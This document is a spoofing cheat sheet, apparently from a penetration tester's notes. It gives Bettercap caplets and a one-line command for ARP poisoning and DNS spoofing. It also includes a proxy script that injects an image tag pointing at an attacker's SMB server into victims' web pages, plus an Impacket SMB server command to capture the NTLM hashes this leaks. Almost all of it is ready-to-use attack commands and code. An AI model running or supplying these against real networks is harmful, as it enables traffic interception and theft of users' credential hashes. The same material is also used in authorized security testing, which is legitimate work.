Spoofing cheathsheet
====================

[[_TOC_]]

[Bettercap](https://github.com/bettercap/bettercap)
===================================================

##### DNS & ARP spoofing
Spoofing caplet

    # set arp targets, i.e. router/gateway, network clients
    set arp.spoof.targets <target_ip>, <gateway>
    arp.spoof on

    # set the dns domains to spoof, i.e. *.com, *.example.com, *
    set dns.spoof.domains <domain_or_wildcard>, <domain_or_wildcard>

    # set the dns address to respond with
    set dns.spoof.address <my_ip>
    dns.spoof on

Inline version

    bettercap -iface <iface> -eval 'set arp.spoof.targets <target_ip>, <gateway>;
        arp.spoof on; \
        set dns.spoof.domains <domain_or_wildcard>, <domain_or_wildcard>; \
        set dns.spoof.address <my_ip>; \
        dns.spoof on'

##### Inject content into HTTP to acquire NTLM hash (IE only)
Injection caplet

    set arp.spoof.targets <target>
    set http.proxy.script </path/to/file.js>
    http.proxy on
    sleep 2
    arp.spoof on

HTTP proxy JS

    function onLoad() {
        log("Successfully loaded HTTP proxy script.");
    }

    function onResponse(req, res) {
        if(res.ContentType.indexOf('text/html') == 0) {
            var body = res.ReadBody();
            if(body.indexOf('</head>') != -1) {
                log("Successfully injected in response (onResponse function call).");
                res.Body = body.replace( 
                    '</head>', 
                    '<img src=\\\\<smb_server_ip>\\share\\test.jpg></head>' 
                ); 
            }
        }
    }

##### Impacket smb server

    smbserver.py share /tmp -smb2support

